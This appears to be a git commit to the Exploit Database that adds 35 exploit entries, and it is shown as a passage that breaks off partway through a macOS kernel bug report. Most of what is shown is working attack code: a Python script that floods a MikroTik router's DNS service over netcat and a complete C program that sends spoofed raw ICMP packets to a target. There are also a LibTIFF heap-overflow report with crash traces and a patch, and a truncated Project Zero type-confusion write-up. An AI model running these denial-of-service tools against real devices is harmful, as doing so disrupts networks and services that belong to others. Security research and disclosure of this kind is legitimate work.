From 9cea53a35bddad54f56bf73e503ebd9f1af906a2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 12 Dec 2017 05:02:17 +0000 Subject: [PATCH] DB: 2017-12-12 35 changes to exploits/shellcodes MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service MikroTik 6.40.5 ICMP - Denial of Service iOS/macOS - Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules macOS XNU Kernel - Memory Disclosure due to bug in Kernel API for Detecting Kernel Memory Disclosures macOS - 'getrusage' Stack Leak Through struct Padding macOS - 'necp_get_socket_attributes' so_pcb Type Confusion LibTIFF pal2rgb 4.0.9 - Heap Buffer Overflow Entrepreneur Dating Script 2.0.1 - 'marital' / 'gender' / 'country' / 'profileid' SQL Injection Secure E-commerce Script 2.0.1 - 'searchcat' / 'searchmain' SQL Injection Laundry Booking Script 1.0 - 'list?city' SQL Injection Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection Multivendor Penny Auction Clone Script 1.0 - SQL Injection Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection Opensource Classified Ads Script 3.2 - SQL Injection PHP Multivendor Ecommerce 1.0 - 'sid' / 'searchcat' / 'chid1' SQL Injection Professional Service Script 1.0 - 'service-list?city' SQL Injection Readymade PHP Classified Script 3.3 - 'subctid' / 'mctid' SQL Injection Readymade Video Sharing Script 3.2 - SQL Injection Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection Multireligion Responsive Matrimonial 4.7.2 - 'succid' SQL Injection Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection Multiplex Movie Theater Booking Script 3.1.5 - 'moid' / 'eid' SQL Injection Single Theater Booking Script 3.2.1 - 'findcity.php?q' SQL Injection Advanced Real Estate Script 4.0.7 - SQL Injection Entrepreneur Bus Booking Script 3.0.4 - 'sourcebus' SQL Injection MLM Forex Market Plan Script 2.0.4 - 'newid' / 'eventid' SQL Injection MLM Forced Matrix 2.0.9 - 'newid' SQL Injection Car Rental Script 2.0.4 - 'val' SQL Injection Groupon Clone Script 3.01 - 'state_id' / 'search' SQL Injection Muslim Matrimonial Script 3.02 - 'succid' SQL Injection Advanced World Database 2.0.5 - SQL Injection Resume Clone Script 2.0.5 - SQL Injection Basic Job Site Script 2.0.5 - SQL Injection Vanguard 1.4 - Arbitrary File Upload Vanguard 1.4 - SQL Injection --- exploits/hardware/dos/43200.py | 41 ++++ exploits/hardware/dos/43317.c | 162 +++++++++++++ exploits/linux/dos/43322.txt | 391 ++++++++++++++++++++++++++++++++ exploits/macos/dos/43318.c | 69 ++++++ exploits/macos/dos/43319.c | 201 ++++++++++++++++ exploits/macos/dos/43321.c | 235 +++++++++++++++++++ exploits/multiple/dos/43320.txt | 36 +++ exploits/php/webapps/43278.txt | 46 ++++ exploits/php/webapps/43287.txt | 34 +++ exploits/php/webapps/43288.txt | 28 +++ exploits/php/webapps/43289.txt | 28 +++ exploits/php/webapps/43290.txt | 28 +++ exploits/php/webapps/43291.txt | 37 +++ exploits/php/webapps/43292.html | 29 +++ exploits/php/webapps/43293.txt | 49 ++++ exploits/php/webapps/43294.txt | 28 +++ exploits/php/webapps/43295.txt | 35 +++ exploits/php/webapps/43296.txt | 35 +++ exploits/php/webapps/43297.txt | 35 +++ exploits/php/webapps/43299.txt | 27 +++ exploits/php/webapps/43300.txt | 36 +++ exploits/php/webapps/43301.txt | 39 ++++ exploits/php/webapps/43302.txt | 27 +++ exploits/php/webapps/43304.txt | 57 +++++ exploits/php/webapps/43305.txt | 29 +++ exploits/php/webapps/43306.txt | 33 +++ exploits/php/webapps/43307.txt | 26 +++ exploits/php/webapps/43308.txt | 27 +++ exploits/php/webapps/43309.txt | 30 +++ exploits/php/webapps/43310.txt | 27 +++ exploits/php/webapps/43311.txt | 34 +++ exploits/php/webapps/43312.txt | 27 +++ exploits/php/webapps/43314.html | 29 +++ exploits/php/webapps/43315.txt | 43 ++++ exploits/php/webapps/43316.txt | 27 +++ files_exploits.csv | 35 +++ 36 files changed, 2100 insertions(+) create mode 100755 exploits/hardware/dos/43200.py create mode 100644 exploits/hardware/dos/43317.c create mode 100644 exploits/linux/dos/43322.txt create mode 100644 exploits/macos/dos/43318.c create mode 100644 exploits/macos/dos/43319.c create mode 100644 exploits/macos/dos/43321.c create mode 100644 exploits/multiple/dos/43320.txt create mode 100644 exploits/php/webapps/43278.txt create mode 100644 exploits/php/webapps/43287.txt create mode 100644 exploits/php/webapps/43288.txt create mode 100644 exploits/php/webapps/43289.txt create mode 100644 exploits/php/webapps/43290.txt create mode 100644 exploits/php/webapps/43291.txt create mode 100644 exploits/php/webapps/43292.html create mode 100644 exploits/php/webapps/43293.txt create mode 100644 exploits/php/webapps/43294.txt create mode 100644 exploits/php/webapps/43295.txt create mode 100644 exploits/php/webapps/43296.txt create mode 100644 exploits/php/webapps/43297.txt create mode 100644 exploits/php/webapps/43299.txt create mode 100644 exploits/php/webapps/43300.txt create mode 100644 exploits/php/webapps/43301.txt create mode 100644 exploits/php/webapps/43302.txt create mode 100644 exploits/php/webapps/43304.txt create mode 100644 exploits/php/webapps/43305.txt create mode 100644 exploits/php/webapps/43306.txt create mode 100644 exploits/php/webapps/43307.txt create mode 100644 exploits/php/webapps/43308.txt create mode 100644 exploits/php/webapps/43309.txt create mode 100644 exploits/php/webapps/43310.txt create mode 100644 exploits/php/webapps/43311.txt create mode 100644 exploits/php/webapps/43312.txt create mode 100644 exploits/php/webapps/43314.html create mode 100644 exploits/php/webapps/43315.txt create mode 100644 exploits/php/webapps/43316.txt diff --git a/exploits/hardware/dos/43200.py b/exploits/hardware/dos/43200.py new file mode 100755 index 000000000..7759591e6 --- /dev/null +++ b/exploits/hardware/dos/43200.py @@ -0,0 +1,41 @@ +import socket +import os +import time +from threading import Thread +import sys + + +def rep1(): + os.system('echo -ne "\x4d\x69\x6b\x72\x6f\x54\x69\x6b\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x20\x6f\x6e\x20\x44\x4e\x53\x20\x73\x65\x72\x76\x69\x63\x65\x2e\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69" | dd conv=notrunc bs=1000 seek=500 of=/home/constantine/test/poc') + os.system('cat poc | nc -v 192.168.1.1 53') + +def rep2(): + os.system('cat poc | nc -v 192.168.1.1 53') + +def rep3(): + os.system('cat poc | nc -v 192.168.1.1 53') + +def rep4(): + os.system('cat poc | nc -v 192.168.1.1 53') + +def rep5(): + os.system('cat poc | nc -v 192.168.1.1 53') + + + +if __name__ == "__main__": + threads = [] + try: + for a in [rep1, rep2, rep3, rep4, rep5]: + t = Thread(target=a) + t.start() + threads.append(t) + time.sleep(4) + time.sleep(4) + print("For Stopping the attack, Hit CTRL+C now") + + + except KeyboardInterrupt: + sys.exit(0) + finally: + [t.join() for t in threads] \ No newline at end of file diff --git a/exploits/hardware/dos/43317.c b/exploits/hardware/dos/43317.c new file mode 100644 index 000000000..a33a83c30 --- /dev/null +++ b/exploits/hardware/dos/43317.c @@ -0,0 +1,162 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#define handle(i) htons(i) +#define cicmp 32 +#define aicmp() (a_flags & cicmp) +#define sending_p() if (sendto(rawsock,&packet,(sizeof packet),0,(struct sockaddr *)&victim,sizeof victim) < 0) {\ +perror("sendto");\ +exit(-1);\ +} +struct sockaddr_in victim; +u_long change(const char *host); +static void inject_iphdr(struct ip *ip, u_char p, u_char len); +char *class2ip(const char *class); +static void send_icmp(u_char garbage); +char *get_plain(const char *crypt_file, const char *xor_data_key); +static void usage(const char *argv0); +u_long dstaddr; +u_short dst_sp, dst_ep, src_sp, src_ep; +char *src_class, *dst_class; +int a_flags, rawsock; +struct { +int a; +int b; +void (*f)(u_char); +} a_list[] = { +{ cicmp, ICMP_ECHO, send_icmp }, +{ 0, 0, (void *)NULL }, +}; +int +main(int argc, char *argv[]) +{ +int n, i, on = 1; +int b_link; +#ifdef F_PASS +struct stat sb; +#endif +unsigned int until; +a_flags = dstaddr = i = 0; +dst_sp = dst_ep = src_sp = src_ep = 0; +until = b_link = -1; +src_class = dst_class = NULL; +while ( (n = getopt(argc, argv, "Is:h:")) != -1) { +char *p; +switch (n) { +case 'I': +a_flags |= cicmp; +break; +case 'h': +dstaddr = change(optarg); +break; +default: +usage(argv[0]); +break; +} +} +if ( (!dstaddr && !i) || +(dstaddr && i) || +( !aicmp()) || +(src_sp != 0 && src_sp > src_ep) || +(dst_sp != 0 && dst_sp > dst_ep)) +usage(argv[0]); +if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { +perror("socket"); +exit(-1); +} +for (n = 0; ; ) { +if (b_link != -1 && random() % 100 +1 > b_link) { +if (random() % 200 +1 > 199) +usleep(1); +continue; +} +for (i = 0; a_list[i].f != NULL; ++i) { +if (a_list[i].a & a_flags) +a_list[i].f(a_list[i].b); +} +if (n++ == 100) { +n = 0; +} +} +exit(0); +} +u_long change(const char *host) +{ +struct hostent *hp; + +if ( (hp = gethostbyname(host)) == NULL) { +perror("gethostbyname"); +exit(-1); +} +return *(u_long *)hp->h_addr; +} +#define RANDOM() (int) random() % 255 +1 +char * +class2ip(const char *class) +{ +static char ip[16]; +int i, j; + +for (i = 0, j = 0; class[i] != '{TEXTO}'; ++i) +if (class[i] == '.') +++j; +switch (j) { +case 0: +sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM()); +break; +case 1: +sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM()); +break; +case 2: +sprintf(ip, "%s.%d", class, RANDOM()); +break; +default: strncpy(ip, class, 16); +break; +} +return ip; +} +static void +inject_iphdr(struct ip *ip, u_char p, u_char len) +{ +ip->ip_hl = 5; +ip->ip_v = 4; +ip->ip_p = p; +ip->ip_tos = 0; +ip->ip_id = random(); +ip->ip_len = len; +ip->ip_off = 0; +ip->ip_ttl = 255; +ip->ip_dst.s_addr = dst_class != NULL ? +inet_addr(class2ip(dst_class)) : +dstaddr; +ip->ip_src.s_addr = src_class != NULL ? +inet_addr(class2ip(src_class)) : +random(); +victim.sin_addr.s_addr = ip->ip_dst.s_addr; +} + +static void +send_icmp(u_char gargabe) +{ +struct packet { +struct ip ip; +struct icmp icmp; +} packet; +memset(&packet, 0, sizeof packet); +inject_iphdr(&packet.ip, IPPROTO_ICMP, handle(sizeof packet)); +packet.icmp.icmp_type = ICMP_ECHO; +packet.icmp.icmp_code = 0; +packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8)); +sending_p(); +} +static void +usage(const char *argv0) +{ +printf("-I -h IP\n"); +exit(-1); +} \ No newline at end of file diff --git a/exploits/linux/dos/43322.txt b/exploits/linux/dos/43322.txt new file mode 100644 index 000000000..f1250cd49 --- /dev/null +++ b/exploits/linux/dos/43322.txt @@ -0,0 +1,391 @@ +Source: http://bugzilla.maptools.org/show_bug.cgi?id=2750 + +The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null + +The asan debug information is below: + +TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag +ignored. +TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag +ignored. +sample.tiff: JPEG compression support is not configured. +TIFFSetField: /dev/null: Unknown pseudo-tag 65537. +TIFFSetField: /dev/null: Unknown pseudo-tag 65538. +sample.tiff: JPEG compression support is not configured. +================================================================= +==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address +0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8 +WRITE of size 1 at 0x611000009fe1 thread T0 + #0 0x4f3108 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108) + #1 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #2 0x419ba5 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5) + +0x611000009fe1 is located 0 bytes to the right of 225-byte region +[0x611000009f00,0x611000009fe1) +allocated by thread T0 here: + #0 0x4c3f08 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08) + #1 0x4f2748 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748) + #2 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + +SUMMARY: AddressSanitizer: heap-buffer-overflow +(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108) +Shadow bytes around the buggy address: + 0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa + 0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29649==ABORTING + +pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188. +That cause heap overflow and lead to memory corruption in TIFFSetupStrips(). + +(gdb) r sample.tiff /dev/null +The program being debugged has been started already. +Start it from the beginning? (y or n) y + +Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff +/dev/null +TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag +ignored. +TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag +ignored. +sample.tiff: JPEG compression support is not configured. +TIFFSetField: /dev/null: Unknown pseudo-tag 65537. +TIFFSetField: /dev/null: Unknown pseudo-tag 65538. +sample.tiff: JPEG compression support is not configured. +*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory +corruption: 0x0000000000652160 *** + +Program received signal SIGABRT, Aborted. +0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. +(gdb) bt +#0 0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#1 0x00007ffff7745028 in __GI_abort () at abort.c:89 +#2 0x00007ffff777e2a4 in __libc_message (do_abort=1, + fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n") + at ../sysdeps/posix/libc_fatal.c:175 +#3 0x00007ffff778c584 in malloc_printerr (ptr=0x652160, + str=0x7ffff788c4df "malloc(): memory corruption", action=) +at malloc.c:4998 +#4 _int_malloc (av=0x7ffff7acd760 , bytes=24) at malloc.c:3449 +#5 0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893 +#6 0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at +tif_write.c:545 +#7 0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=, + module=0x42de50 "TIFFWriteScanline") at tif_write.c:613 +#8 0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80, +buf=buf@entry=0x652070, + row=row@entry=0, sample=sample@entry=0) at tif_write.c:56 +#9 0x0000000000401dbd in main (argc=, argv=) at +pal2rgb.c:200 + +Affected version: 4.0.9 +Latest version: 4.0.9 + +pal2rgb allocate output buffer to convert TIFF format. The output buffer always +uses a fixed size(225). However, when write data to output buffer, imagewidth +and imagelength of the input TIFF file are used. it lead to heap overflow. + +1) get imagewidth and imagelength from input TIFF + +tools/pal2rgb.c:142 TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth); +tools/pal2rgb.c:143 TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength); + +2) allocate output buffer +tools/pal2rgb.c:188 obuf = (unsigned +char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns +always 225. + +3) write data to output buffer +tools/pal2rgb.c:191 for (row = 0; row < imagelength; row++) { +tools/pal2rgb.c:192 if (!TIFFReadScanline(in, ibuf, row, 0)) +tools/pal2rgb.c:193 goto done; +tools/pal2rgb.c:194 pp = obuf; +tools/pal2rgb.c:195 for (x = 0; x < imagewidth; x++) { // HEAP +OVERFLOW! +tools/pal2rgb.c:196 *pp++ = (unsigned char) rmap[ibuf[x]]; +tools/pal2rgb.c:197 *pp++ = (unsigned char) gmap[ibuf[x]]; +tools/pal2rgb.c:198 *pp++ = (unsigned char) bmap[ibuf[x]]; +tools/pal2rgb.c:199 } +tools/pal2rgb.c:200 if (!TIFFWriteScanline(out, obuf, row, 0)) // +CRASH! +tools/pal2rgb.c:201 goto done; +tools/pal2rgb.c:202 } + +The process's heap memory was corrupted by COLORMAP/mage Width/Image Length of +the TIFF document. The offset of the corresponding values in the poc.tiff file +is shown below. + +COLORMAP { + R : 0x25~0x224 + G : 0x225~0x424 + B : 0x425~0x624 +} + +Image Width : 0x24FE +Image Length : 0x250A + + + Note +You need to log in before you can comment on or make changes to this bug. + +Description From jungun.baek 2017-11-29 00:50:42 +The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null + +The asan debug information is below: + +TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag +ignored. +TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag +ignored. +sample.tiff: JPEG compression support is not configured. +TIFFSetField: /dev/null: Unknown pseudo-tag 65537. +TIFFSetField: /dev/null: Unknown pseudo-tag 65538. +sample.tiff: JPEG compression support is not configured. +================================================================= +==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address +0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8 +WRITE of size 1 at 0x611000009fe1 thread T0 + #0 0x4f3108 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108) + #1 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #2 0x419ba5 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5) + +0x611000009fe1 is located 0 bytes to the right of 225-byte region +[0x611000009f00,0x611000009fe1) +allocated by thread T0 here: + #0 0x4c3f08 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08) + #1 0x4f2748 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748) + #2 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + +SUMMARY: AddressSanitizer: heap-buffer-overflow +(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108) +Shadow bytes around the buggy address: + 0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa + 0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29649==ABORTING + +pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188. +That cause heap overflow and lead to memory corruption in TIFFSetupStrips(). + +(gdb) r sample.tiff /dev/null +The program being debugged has been started already. +Start it from the beginning? (y or n) y + +Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff +/dev/null +TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag +ignored. +TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag +ignored. +sample.tiff: JPEG compression support is not configured. +TIFFSetField: /dev/null: Unknown pseudo-tag 65537. +TIFFSetField: /dev/null: Unknown pseudo-tag 65538. +sample.tiff: JPEG compression support is not configured. +*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory +corruption: 0x0000000000652160 *** + +Program received signal SIGABRT, Aborted. +0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. +(gdb) bt +#0 0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#1 0x00007ffff7745028 in __GI_abort () at abort.c:89 +#2 0x00007ffff777e2a4 in __libc_message (do_abort=1, + fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n") + at ../sysdeps/posix/libc_fatal.c:175 +#3 0x00007ffff778c584 in malloc_printerr (ptr=0x652160, + str=0x7ffff788c4df "malloc(): memory corruption", action=) +at malloc.c:4998 +#4 _int_malloc (av=0x7ffff7acd760 , bytes=24) at malloc.c:3449 +#5 0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893 +#6 0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at +tif_write.c:545 +#7 0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=, + module=0x42de50 "TIFFWriteScanline") at tif_write.c:613 +#8 0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80, +buf=buf@entry=0x652070, + row=row@entry=0, sample=sample@entry=0) at tif_write.c:56 +#9 0x0000000000401dbd in main (argc=, argv=) at +pal2rgb.c:200 + +Affected version: 4.0.9 +Latest version: 4.0.9 +------- Comment #1 From jungun.baek 2017-11-29 01:44:26 ------- +pal2rgb allocate output buffer to convert TIFF format. The output buffer always +uses a fixed size(225). However, when write data to output buffer, imagewidth +and imagelength of the input TIFF file are used. it lead to heap overflow. + +1) get imagewidth and imagelength from input TIFF + +tools/pal2rgb.c:142 TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth); +tools/pal2rgb.c:143 TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength); + +2) allocate output buffer +tools/pal2rgb.c:188 obuf = (unsigned +char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns +always 225. + +3) write data to output buffer +tools/pal2rgb.c:191 for (row = 0; row < imagelength; row++) { +tools/pal2rgb.c:192 if (!TIFFReadScanline(in, ibuf, row, 0)) +tools/pal2rgb.c:193 goto done; +tools/pal2rgb.c:194 pp = obuf; +tools/pal2rgb.c:195 for (x = 0; x < imagewidth; x++) { // HEAP +OVERFLOW! +tools/pal2rgb.c:196 *pp++ = (unsigned char) rmap[ibuf[x]]; +tools/pal2rgb.c:197 *pp++ = (unsigned char) gmap[ibuf[x]]; +tools/pal2rgb.c:198 *pp++ = (unsigned char) bmap[ibuf[x]]; +tools/pal2rgb.c:199 } +tools/pal2rgb.c:200 if (!TIFFWriteScanline(out, obuf, row, 0)) // +CRASH! +tools/pal2rgb.c:201 goto done; +tools/pal2rgb.c:202 } +------- Comment #2 From jungun.baek 2017-11-29 02:28:44 ------- +Created an attachment (id=819) [details] +heap overflow PoC +------- Comment #3 From jungun.baek 2017-11-29 06:33:21 ------- +The process's heap memory was corrupted by COLORMAP/mage Width/Image Length of +the TIFF document. The offset of the corresponding values in the poc.tiff file +is shown below. + +COLORMAP { + R : 0x25~0x224 + G : 0x225~0x424 + B : 0x425~0x624 +} + +Image Width : 0x24FE +Image Length : 0x250A +------- Comment #4 From ncopa@alpinelinux.org 2017-12-07 04:42:35 ------- +The following change fixes the describe behavior: + +diff --git a/tools/pal2rgb.c b/tools/pal2rgb.c +index 7a57800..92d9e29 100644 +--- a/tools/pal2rgb.c ++++ b/tools/pal2rgb.c +@@ -184,15 +184,17 @@ main(int argc, char* argv[]) + { unsigned char *ibuf, *obuf; + register unsigned char* pp; + register uint32 x; +- ibuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(in)); +- obuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(out)); ++ size_t ibuf_size = TIFFScanlineSize(in); ++ size_t obuf_size = TIFFScanlineSize(out); ++ ibuf = (unsigned char*)_TIFFmalloc(ibuf_size); ++ obuf = (unsigned char*)_TIFFmalloc(obuf_size); + switch (config) { + case PLANARCONFIG_CONTIG: + for (row = 0; row < imagelength; row++) { + if (!TIFFReadScanline(in, ibuf, row, 0)) + goto done; + pp = obuf; +- for (x = 0; x < imagewidth; x++) { ++ for (x = 0; x < imagewidth && x < (obuf_size-3); x++) { + *pp++ = (unsigned char) rmap[ibuf[x]]; + *pp++ = (unsigned char) gmap[ibuf[x]]; + *pp++ = (unsigned char) bmap[ibuf[x]]; +@@ -205,15 +207,15 @@ main(int argc, char* argv[]) + for (row = 0; row < imagelength; row++) { + if (!TIFFReadScanline(in, ibuf, row, 0)) + goto done; +- for (pp = obuf, x = 0; x < imagewidth; x++) ++ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++) + *pp++ = (unsigned char) rmap[ibuf[x]]; + if (!TIFFWriteScanline(out, obuf, row, 0)) + goto done; +- for (pp = obuf, x = 0; x < imagewidth; x++) ++ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++) + *pp++ = (unsigned char) gmap[ibuf[x]]; + if (!TIFFWriteScanline(out, obuf, row, 0)) + goto done; +- for (pp = obuf, x = 0; x < imagewidth; x++) ++ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++) + *pp++ = (unsigned char) bmap[ibuf[x]]; + if (!TIFFWriteScanline(out, obuf, row, 0)) + goto done; + + +But the pal2rgb stil segfaults. new backtrace: + +Core was generated by `pal2rgb /home/ncopa/Downloads/poc.tiff out.tiff'. +Program terminated with signal SIGSEGV, Segmentation fault. +#0 0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8 +(gdb) bt +#0 0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8 +#1 0x000065eb6f9c26b7 in TIFFjpeg_abort (sp=sp@entry=0xdbd8738e7c0) + at tif_jpeg.c:416 +#2 0x000065eb6f9c3f8c in JPEGPreDecode (tif=0x65eb6fc06900, s=) + at tif_jpeg.c:1114 +#3 0x000065eb6f9d4305 in TIFFSeek (sample=0, row=54, tif=0x65eb6fc06900) + at tif_read.c:379 +#4 TIFFReadScanline (tif=0x65eb6fc06900, buf=0xdbd8738ef40, row=54, + sample=) at tif_read.c:446 +#5 0x00000dbd8718c5fc in main (argc=, argv=) + at pal2rgb.c:194 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43322.zip \ No newline at end of file diff --git a/exploits/macos/dos/43318.c b/exploits/macos/dos/43318.c new file mode 100644 index 000000000..63ceffb22 --- /dev/null +++ b/exploits/macos/dos/43318.c @@ -0,0 +1,69 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1392&desc=2 + +When getsockopt() [edited; original report said "setsockopt"] is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked. +necp_get_socket_attributes() unconditionally calls sotoinpcb(so): + + errno_t + necp_get_socket_attributes(struct socket *so, struct sockopt *sopt) + { + int error = 0; + u_int8_t *buffer = NULL; + u_int8_t *cursor = NULL; + size_t valsize = 0; + struct inpcb *inp = sotoinpcb(so); + + if (inp->inp_necp_attributes.inp_domain != NULL) { + valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain); + } + [...] + } + +sotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket): + + #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb) + +If necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`). + + +To trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in 